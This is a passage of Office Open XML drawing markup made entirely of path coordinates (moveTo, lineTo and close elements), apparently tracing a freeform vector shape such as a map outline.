                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11635" y="16562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11749" y="16675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11753" y="16734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11645" y="16727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11675" y="16819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11731" y="16825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11741" y="16932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11828" y="16892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11781" y="16799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11776" y="16749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11918" y="16781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11862" y="16609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11812" y="16555"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11201" y="16683"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11229" y="16755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11216" y="16835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11224" y="16907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11340" y="16856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11425" y="16789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11428" y="16724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11310" y="16729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11201" y="16683"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10763" y="16767"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10667" y="16920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10554" y="17025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10421" y="17114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10329" y="17217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10576" y="17080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10674" y="16978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797" y="16894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10763" y="16767"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11605" y="16771"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11470" y="16925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11499" y="16821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11398" y="16833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11377" y="16931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11332" y="16974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11295" y="17016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11409" y="17117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11467" y="17070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11524" y="16971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11589" y="16919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11605" y="16771"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19622" y="16853"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19605" y="16860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19573" y="16905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19536" y="16941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19482" y="17018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19471" y="17053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19516" y="17006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19582" y="16925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19622" y="16853"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6375" y="16957"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6386" y="17033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6558" y="17245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6686" y="17363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6774" y="17508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6928" y="17638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6992" y="17760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7043" y="17890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7198" y="18040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7334" y="18254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7425" y="18370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7561" y="18503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7640" y="18595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7874" y="18743"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8031" y="18873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8230" y="18907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8231" y="18723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8273" y="18577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8184" y="18483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8050" y="18446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7986" y="18363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7954" y="18267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7890" y="18250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7785" y="18185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7858" y="18092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7721" y="18003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7619" y="17868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7469" y="17740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7289" y="17695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7124" y="17505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7029" y="17420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6896" y="17289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6750" y="17106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6484" y="16998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6375" y="16957"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11854" y="16983"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11867" y="17099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11738" y="17111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11707" y="17180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11568" y="17228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11500" y="17163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11401" y="17223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11283" y="17269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11211" y="17397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11243" y="17439"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11379" y="17353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11467" y="17355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11525" y="17291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11643" y="17355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11588" y="17429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11642" y="17531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11860" y="17602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11914" y="17531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11852" y="17427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11938" y="17346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12009" y="17491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12069" y="17351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12057" y="17271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12037" y="17173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12022" y="17117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12005" y="17043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11854" y="16983"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10243" y="17427"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10149" y="17538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10004" y="17631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9844" y="17700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9770" y="17747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9677" y="17829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9543" y="17930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9320" y="17939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9241" y="17956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9203" y="18068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9059" y="18077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8923" y="18015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8814" y="18090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8792" y="18210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8817" y="18329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8906" y="18452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8999" y="18499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9029" y="18673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9181" y="18705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9304" y="18711"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9371" y="18779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9591" y="18754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9686" y="18801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9819" y="18818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9893" y="18898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10105" y="18855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10132" y="18900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10204" y="18713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10207" y="18587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10388" y="18504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10381" y="18387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10443" y="18297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10665" y="18286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10455" y="18156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10487" y="18094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10351" y="17959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10457" y="17836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10595" y="17791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10561" y="17722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10687" y="17715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10701" y="17659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10544" y="17614"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10421" y="17570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10415" y="17508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10319" y="17430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10243" y="17427"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17829" y="17580"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17782" y="17611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17801" y="17661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17887" y="17696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17912" y="17663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17865" y="17643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17829" y="17580"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16468" y="17646"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16382" y="17648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16336" y="17696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16451" y="17685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16540" y="17698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16609" y="17707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16643" y="17739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16668" y="17797"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16720" y="17742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16705" y="17686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16648" y="17675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16587" y="17651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16522" y="17649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16468" y="17646"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17653" y="17654"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17543" y="17670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17479" y="17678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17456" y="17703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17506" y="17712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17579" y="17708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17685" y="17691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17681" y="17671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17653" y="17654"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16951" y="17696"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16927" y="17720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16952" y="17796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17013" y="17838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17074" y="17850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17117" y="17818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17143" y="17772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17075" y="17769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17008" y="17730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16964" y="17725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16951" y="17696"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17952" y="17723"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17925" y="17737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17848" y="17762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17887" y="17797"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17983" y="17737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17952" y="17723"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17220" y="17739"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17210" y="17762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17266" y="17779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17328" y="17771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17358" y="17749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17304" y="17742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17220" y="17739"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17772" y="17749"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17732" y="17752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17641" y="17791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17624" y="17841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17651" y="17841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17735" y="17801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17791" y="17764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17772" y="17749"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18474" y="17750"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18425" y="17764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18402" y="17841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18408" y="17856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18437" y="17831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18466" y="17819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18474" y="17750"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16564" y="17771"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16469" y="17814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16481" y="17880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16390" y="17962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16341" y="18021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16249" y="18070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16237" y="18011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16213" y="18025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16185" y="18092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16096" y="18137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15951" y="18178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15934" y="18220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16025" y="18217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16156" y="18198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16242" y="18163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16326" y="18100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16417" y="18035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16444" y="17989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16528" y="17944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16587" y="17846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16596" y="17777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16564" y="17771"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18454" y="17840"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18439" y="17870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18462" y="17883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18508" y="17840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18454" y="17840"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12339" y="18042"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12276" y="18097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12239" y="18208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12295" y="18373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12371" y="18449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12423" y="18427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12345" y="18366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12374" y="18284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12470" y="18286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12480" y="18168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12461" y="18116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12352" y="18114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12339" y="18042"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11803" y="18158"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11620" y="18265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11403" y="18281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11167" y="18269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11021" y="18232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10861" y="18331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10820" y="18387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10726" y="18582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10701" y="18685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10623" y="18765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10680" y="18851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10760" y="18853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10788" y="18971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10736" y="19082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10815" y="19117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10935" y="19100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10926" y="18927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10911" y="18784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11036" y="18743"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11022" y="18866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11157" y="18935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11133" y="18982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11179" y="19016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11362" y="18964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11271" y="19065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11345" y="19104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11445" y="19067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11446" y="18988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11280" y="18851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11313" y="18807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11137" y="18651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11302" y="18597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11384" y="18520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11465" y="18535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11480" y="18474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11132" y="18530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11029" y="18589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10861" y="18474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10888" y="18375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11052" y="18355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11366" y="18341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11546" y="18360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11687" y="18328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11837" y="18185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11803" y="18158"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15321" y="18210"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15007" y="18237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14707" y="18237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14518" y="18262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14389" y="18250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14237" y="18242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14077" y="18279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13870" y="18400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13717" y="18563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13532" y="18523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13483" y="18326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13455" y="18284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13162" y="18279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13067" y="18334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12818" y="18402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12896" y="18456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13061" y="18456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13133" y="18520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13401" y="18477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13416" y="18508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13285" y="18528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13088" y="18604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13226" y="18644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13226" y="18696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13266" y="18735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13337" y="18713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13391" y="18644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13662" y="18708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13810" y="18688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14151" y="18717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14232" y="18796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14271" y="18912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14158" y="18969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14076" y="19078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14300" y="19023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14345" y="18981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14522" y="18957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14668" y="19008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14847" y="18964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14941" y="18954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15079" y="18875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15065" y="18799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15173" y="18730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15320" y="18651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15533" y="18627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15609" y="18696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15697" y="18723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15815" y="18747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15976" y="18700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16112" y="18658"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16148" y="18669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16254" y="18619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16277" y="18580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16114" y="18604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16165" y="18563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16043" y="18594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16057" y="18541"/>
